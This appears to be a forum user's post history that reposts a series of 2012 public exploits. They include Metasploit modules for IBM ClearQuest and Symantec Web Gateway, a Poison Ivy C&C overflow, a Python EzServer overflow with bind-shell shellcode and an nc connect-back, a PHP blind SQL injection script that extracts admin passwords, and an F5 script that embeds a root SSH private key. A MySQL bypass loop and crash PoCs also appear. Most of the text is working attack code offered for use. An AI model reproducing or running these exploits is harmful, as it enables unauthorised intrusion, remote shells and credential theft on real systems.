-
Posts
425 -
Joined
-
Last visited
-
Days Won
2
Posts posted by The_Arhitect
-
-
-
IBM Rational ClearQuest CQOle Remote Code Execution
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "7.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:classid => "{94773112-72E8-11D0-A42E-00A024DED613}",
:method => "RegisterSchemaRepoFromFileByDbSet",
:rank => NormalRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "IBM Rational ClearQuest CQOle Remote Code Execution",
'Description' => %q{
This module exploits a function prototype mismatch on the CQOle ActiveX
control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which
allows reliable remote code execution when DEP isn't enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrea Micalizzi aka rgod', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-0708' ],
[ 'BID', '53170' ],
[ 'OSVDB', '81443'],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],
[ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],
],
'Payload' =>
{
'BadChars' => "\x00"
},
'DefaultOptions' =>
{
'ExitFunction' => "process",
'InitialAutoRunScript' => 'migrate -f'
},
'Platform' => 'win',
'Targets' =>
[
# cqole.dll 7.1100.0.150
[ 'Automatic', {} ],
[ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite
],
'Privileged' => false,
'DisclosureDate' => "May 19 2012",
'DefaultTarget' => 0))
end
def get_target(agent)
#If the user is already specified by the user, we'll just use that
return target if target.name != 'Automatic'
if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
return targets[1] #IE 6 on Windows XP
elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
return targets[1] #IE 7 on Windows XP
elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
return targets[1] #IE 7 on Windows Vista
else
return nil
end
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
my_target = get_target(agent)
# Avoid the attack if the victim doesn't have the same setup we're targeting
if my_target.nil?
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
send_not_found(cli)
return
end
js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))
object_id = rand_text_alpha(rand(8) + 4)
dbset_value = rand_text_alpha(rand(8) + 4)
var_payload = rand_text_alpha(rand(8) + 4)
html = <<-EOS
<html>
<body>
<object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>
<script language="JavaScript">
var #{var_payload} = unescape("#{js_code}")
#{object_id}.RegisterSchemaRepoFromFileByDbSet("#{dbset_value}", #{var_payload});
</script>
</body>
</html>
EOS
html = html.gsub(/^\t\t/, '')
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
=begin
* RegisterSchemaRepoFromFile and no RegisterSchemaRepoFromFileByDbSet is called:
Breakpoint 0 hit
eax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c
eip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
MFC80U!_AfxDispatchCall+0xe:
78371062 ffd0 call eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}
* RegisterSchemaRepoFromFile prototype (it is going to be executed):
.text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)
his ret is: retn 4
* RegisterSchemaRepoFromFileByDbSet prototype (it should be executed):
.text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)
his ret is: retn 8
* When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall it is what happens:
0:000> p
eax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c
eip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
MFC80U!_AfxDispatchCall+0x10:
78371064 c3 ret
0:000> dd esp
0013e208 001dcff4 7835f5d2 fffffffe 78336a3a
ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and no to the stored EIP on
the stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is
disabled
=end -
Poison Ivy 2.3.2 C&C Server Buffer Overflow
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Brute
def initialize(info = {})
super(update_info(info,
'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
'Description' => %q{
This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
The exploit does not need to know the password chosen for the bot/server
communication. If the C&C is configured with the default 'admin' password,
the exploit should work fine. In case of the C&C configured with another
password the exploit can fail. The 'check' command can be used to determine
if the C&C target is using the default 'admin' password.
Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread
responsible of handling the connection. Because of this the module provides the
RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header
will be used. If the bruteforce target is selected, a random header will be sent in
case the default for the password 'admin' doesn't work. Bruteforce will stop after
5 tries or a session obtained.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Andrzej Dereszowski', # Vulnerability Discovery
'Gal Badishi', # Exploit and Metasploit module
'juan vazquez' # Testing and little of Metasploit-fu
],
'References' =>
[
[ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
[ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
],
'DisclosureDate' => "Jun 24 2012",
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'StackAdjustment' => -4000,
'Space' => 10000,
'BadChars' => "",
},
'Platform' => 'win',
'Targets' =>
[
[ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
}
],
[ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
{
'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
'RWAddress' => 0x00401000,
'Offset' => 0x806D,
'PayloadOffset' => 0x75,
'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
'Bruteforce' =>
{
'Start' => { 'Try' => 1 },
'Stop' => { 'Try' => 6 },
'Step' => 1,
'Delay' => 2
}
}
],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(3460),
OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
], self.class)
register_advanced_options(
[
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
], self.class)
end
def check
sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
lensig = [0x000015D0].pack("V")
connect
sock.put("\x00" * 256)
response = sock.read(256)
datalen = sock.read(4)
disconnect
if datalen == lensig
if response[0, 16] == sig
print_status("Password appears to be \"admin\"")
else
print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
end
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def single_exploit
if datastore['RANDHEADER'] == true
# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
header = rand_text(0x20)
else
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
end
do_exploit(header)
end
def brute_exploit(brute_target)
if brute_target['Try'] == 1
print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
# This is the 32-byte header we want to send, encrypted with the default password ("admin")
# We have a very good chance of succeeding even if the password was changed
header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
else
print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
# Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
header = rand_text(0x20)
end
do_exploit(header)
end
def do_exploit(header)
# Handshake
connect
print_status("Performing handshake...")
sock.put("\x00" * 256)
sock.get
# Don't change the nulls, or it might not work
xploit = ''
xploit << header
xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
xploit << payload.encoded
xploit << "\x00" * (target['Offset'] - xploit.length)
xploit << [target.ret].pack("V") # ret to a jmp esp opcode
xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back)
# The disconnection triggers the exploit
print_status("Sending exploit...")
sock.put(xploit)
select(nil,nil,nil,5)
disconnect
end
end
=begin
* ROP version of exploit(): Has been discarded at the moment because of two reasons:
(1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
(2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter
=end -
-
WordPress Website FAQ Plugin v1.0 SQL Injection
# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0
==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================
Lines 106-115:
function displayAnswer()
{
global $wpdb;
$master_table = $wpdb->prefix . "faq";
$category = $_POST['category'];
$searchtxt = $_POST['searchtxt'];
if($category!=0)
{
$sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
}
===============================================================
Vulnerability Details: faq_category vulnerable to SQL injection
===============================================================
When submitting a query via the widget, intercept the post request via burp or other proxy to find the following:
action=displayAnswer&category=1&searchtxt=[your query]
Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of searchtxt value. -
Ezhometech Ezserver 6.4 Stack Overflow Exploit
# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/
### Software Description
# EZserver is a Video Server that stream Full HD to various devices.
### Vulnerability Details
# Buffer overflow condition exist in URL handling, sending long GET request
# will cause server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so that by sending long characters will make the program crash.
### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.
#!/usr/bin/python
import sys
import struct
from socket import *
from os import system
from time import sleep
hunt = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,
shellcode = ("\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
"\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
"\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
"\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
"\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
"\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
"\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
"\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
"\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
"\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
"\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
"\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
"\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
"\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
"\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
"\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
"\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
"\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
"\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
"\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
"\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
"\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
"\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
"\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
"\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
"\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
"\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
"\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
"\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
"\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
"\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
"\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
"\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
"\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
"\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
"\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
"\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
"\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
"\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
"\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")
junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000
buff = "w00tw00t"
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"
buff+= struct.pack('<L', 0x10212779)
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000
def winxp():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk1+buff
s.send (payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(2)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()
def win2k3():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk2+buff
s.send(payload)
s.close()
print "[+] Wait for hunter.."
sleep(5)
print "[+] Connecting to target shell!"
sleep(1)
system("nc -v %s 4444" %host)
except:
print "[x] Could not connect to the server x_x"
sys.exit()
def crash():
try:
host = raw_input("[!] Target IP: ")
print "[!] Connecting to %s on port 8000" %host
s = socket(AF_INET, SOCK_STREAM)
s.connect((host,8000))
print "[+] Launching attack.."
print "[+] Sending payload.."
payload = junk3
s.send (payload)
s.close()
print "[+] Server should be crashed! Check your debugger"
except:
print "[x] Could not connect to the server x_x"
sys.exit()
print "#################################################################"
print "# EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit #"
print "# by modpr0be[at]spentera | @modpr0be #"
print "# thanks to: otoy, cikumel, y0k | @spentera #"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"
a = 0
while a < 3:
a = a + 1
op = input ("[!] Choose your target OS: ")
if op == 1:
winxp()
sys.exit()
elif op == 2:
win2k3()
sys.exit()
elif op == 3:
crash()
sys.exit()
else:
print "[-] Oh plz.. pick the right one \r\n" -
MyTickets 1 to 2.0.8 Blind SQL Injection
<?php
/*
---------------------------------------------------------------
MyTickets <= Remote Blind SQL Injection Exploit by al-swisre
---------------------------------------------------------------
author...............: al-swisre
mail.................: oy3[at]hotmail[dot]com
software link........: http://phpx3.com/scripts.html#mytickets
affected versions....: from 1 to 2.0.8
[-] Vulnerable code in include/system/general/define.php:
43. if(empty($cookies['language'])){
44. setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/");
45. $language = $setting['default_language'];
46. }else{
47. if($db->count('languages',"`id`='".$cookies['language']."'") == 0){
48. $language = $setting['default_language'];
49. }
50. $language = $cookies['language'];
52. }
52.
53. $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'"));
*/
print "\n+--------------------------------------------------------------------+";
print "\n| MyTickets <= Remote Blind SQL Injection Exploit by al-swisre |";
print "\n+--------------------------------------------------------------------+\n";
if (!extension_loaded('curl')) die("cURL extension required\n");
error_reporting(E_ERROR);
set_time_limit(0);
function get($url,$inj)
{
$curl = curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj");
curl_setopt($curl, CURLOPT_HEADER, 1);
curl_setopt($curl, CURLOPT_VERBOSE, 0);
$calis = curl_exec($curl);
@curl_close($calis);
return $calis;
}
function chek_get($connect)
{
if(eregi("include",$connect))
{
return false;
}
else
{
return true;
}
}
if ($argc < 2)
{
print "\nUsage......: php $argv[0] <url>\n";
print "\nExample....: php $argv[0] http://localhost/mytickets/";
print "\nExample....: php $argv[0] http://localhost/mytickets/\n";
die();
}
$sql_f = chek_get(get($argv[1],"' and 1='2 /*"));
$sql_t = chek_get(get($argv[1],"' and 1='1 /*"));
if($sql_t == $sql_f)
{
print "\n\t sorry: magic_quotes_gpc = On ): \n";
die();
}
print "\n\t[+] Getting Admin Username and Password\n\n\t";
for ($g = 1; $g <= 40; $g++) { //eidt
for ($i = 46; $i <= 122; $i++) {
$inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*"));
if($inject == true){print chr($i);}
}
}
?> -
Total Video Player 1.31 .m3u Crash PoC
# Exploit Title: Total Video Player 1.31 .m3u Crash Poc
# Date: June 17 2012
# Exploit Author: 0dem
# Vendor Homepage: http://www.effectmatrix.com/
# Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html
# Version: V1.31
# Tested on: Windows XP SP 3
# Description: Total Video Player has no correct input handling and will hang,
# when trying to open malformed .m3u files. .mp3 and .avi files are affected too
# --- m3u -----------------------------------------------
#!/usr/bin/python
junk = "#EXTM3U\n"
junk += "#EXTINF:666, 0dem, 0dem\n"
junk += "c:\\A"
file = open("PoC.m3u","w")
file.writelines(junk)
file.close()
# --- mp3 -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.mp3","w")
file.writelines(junk)
file.close()
# --- avi -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.avi","w")
file.writelines(junk)
file.close() -
Bravo!
-
OpenType Font File Format DoS Exploit for Windows
************************************************************************
OpenType font file format remote (client-side) DoS exploit for Windows
By Oleksiuk Dmytro (aka Cr4sh)
http://twitter.com/d_olex
http://blog.cr4.sh
mailto:cr4sh0@gmail.com
************************************************************************
INFO:
Zero day vulnerability exists in kernel-mode library ATMFD.DLL, that using by OS for working with PostScript-based OpenType font files (.OTF)
Vulnerable versions of Windows/ATMFD.DLL: all, x32 and x64.
Opening malicious .OTF font file, that can be embedded in Microsoft Office document or web-page, causes a BSoD on NT 5.x (Windows XP, Server 2003) and 100% CPU overage on NT 6.x (Vista, 7, Server 2008).
To trigger vulnerability -- double click on CFF_Type-1_0x0d_expl.otf
The point of vulnerability -- invalid decoding of 0x0d byte in the Type 2 Charstring Format Glyph, that drops ATMFD.DLL code into the infinite loop.
"good" glyph representation:
[68]={
95 112 99 65 61 vhcurveto
endchar
}
Malicious glyph representation:
[68]={
95 112 99 65 reserved13
vhcurveto
endchar
}
This vulnerability was found with MsFontsFuzz fuzzer, that can be downloaded on https://github.com/Cr4sh/MsFontsFuzz
More detailed vulnerability analysis can be found at http://blog.cr4.sh/2012/06/0day-windows.html (russian, use Google Translate).
====
POC
====
http://www.exploit-db.com/sploits/19089.rar -
Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",
'Description' => %q{
This module exploits a command injection vulnerability found in Symantec Web
Gateway's HTTP service due to the insecure usage of the exec() function. This module
abuses the spywall/ipchange.php file to execute arbitrary OS commands without
authentication.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tenable Network Security', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2012-0297' ],
[ 'BID', '53444' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-090' ],
[ 'URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00' ]
],
'Payload' =>
{
'BadChars' => "\x00\x0d\x0a\x26",
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl',
}
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' =>
[
['Symantec Web Gateway 5.0.2.8', {}],
],
'Privileged' => false,
'DisclosureDate' => "May 17 2012",
'DefaultTarget' => 0))
end
def check
res = send_request_raw({
'method' => 'GET',
'uri' => '/spywall/login.php'
})
if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
post_data = "subnet="
post_data << "\";" + payload.raw + ";#"
print_status("#{peer} - Sending Command injection")
res = send_request_cgi({
'method' => 'POST',
'uri' => "#{uri}spywall/ipchange.php",
'data' => post_data
})
# If the server doesn't return the default redirection, probably
# something is wrong
if not res or res.code != 302 or res.headers['Location'] !~ /SW\/admin_config.php/
print_error("#{peer} - Probably command not executed, aborting!")
return
end
end
endSursa: Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection
-
F5 BIG-IP Remote Root Authentication Bypass Vulnerability
#!/usr/bin/python
#
# Title: F5 BIG-IP Remote Root Authentication Bypass Vulnerability (py)
#
# Quick script written by Dave Kennedy (ReL1K) for F5 authentication root bypass
# http://www.secmaniac.com
#
#
import subprocess,os
filewrite = file("priv.key", "w")
filewrite.write("""-----BEGIN RSA PRIVATE KEY-----
MIICWgIBAAKBgQC8iELmyRPPHIeJ//uLLfKHG4rr84HXeGM+quySiCRgWtxbw4rh
UlP7n4XHvB3ixAKdWfys2pqHD/Hqx9w4wMj9e+fjIpTi3xOdh/YylRWvid3Pf0vk
OzWftKLWbay5Q3FZsq/nwjz40yGW3YhOtpK5NTQ0bKZY5zz4s2L4wdd0uQIBIwKB
gBWL6mOEsc6G6uszMrDSDRbBUbSQ26OYuuKXMPrNuwOynNdJjDcCGDoDmkK2adDF
8auVQXLXJ5poOOeh0AZ8br2vnk3hZd9mnF+uyDB3PO/tqpXOrpzSyuITy5LJZBBv
7r7kqhyBs0vuSdL/D+i1DHYf0nv2Ps4aspoBVumuQid7AkEA+tD3RDashPmoQJvM
2oWS7PO6ljUVXszuhHdUOaFtx60ZOg0OVwnh+NBbbszGpsOwwEE+OqrKMTZjYg3s
37+x/wJBAMBtwmoi05hBsA4Cvac66T1Vdhie8qf5dwL2PdHfu6hbOifSX/xSPnVL
RTbwU9+h/t6BOYdWA0xr0cWcjy1U6UcCQQDBfKF9w8bqPO+CTE2SoY6ZiNHEVNX4
rLf/ycShfIfjLcMA5YAXQiNZisow5xznC/1hHGM0kmF2a8kCf8VcJio5AkBi9p5/
uiOtY5xe+hhkofRLbce05AfEGeVvPM9V/gi8+7eCMa209xjOm70yMnRHIBys8gBU
Ot0f/O+KM0JR0+WvAkAskPvTXevY5wkp5mYXMBlUqEd7R3vGBV/qp4BldW5l0N4G
LesWvIh6+moTbFuPRoQnGO2P6D7Q5sPPqgqyefZS
-----END RSA PRIVATE KEY-----""")
filewrite.close()
subprocess.Popen("chmod 700 priv.key", shell=True).wait()
ipaddr=raw_input("Enter the IP address of the F5: ")
subprocess.Popen("ssh -i priv.key root@%s" % (ipaddr), shell=True).wait()
if os.path.isfile("priv.key"):
os.remove("priv.key")Sursa: F5 BIG-IP Remote Root Authentication Bypass Vulnerability
-
MySQL Remote Root Authentication Bypass
#!/usr/bin/python
#
#
# This has to be the easiest "exploit" ever. Seriously. Embarassed to submit this a little.
#
# Title: MySQL Remote Root Authentication Bypass
# Written by: Dave Kennedy (ReL1K)
# http://www.secmaniac.com
#
# Original advisory here: seclists.org/oss-sec/2012/q2/493
import subprocess
ipaddr = raw_input("Enter the IP address of the mysql server: ")
while 1:
subprocess.Popen("mysql --host=%s -u root mysql --password=blah" % (ipaddr), shell=True).wait() -
phpAcounts v.0.5.3 SQL Injection
######################################################################################
# Exploit phpAcounts v.0.5.3 SQL Injection
# Date: June 6nd 2012
# Author: loneferret
# Version: 0.5.3
# Vendor Url: http://phpaccounts.com/
# Tested on: Ubuntu Server 11.10
######################################################################################
# Discovered by: loneferret
######################################################################################
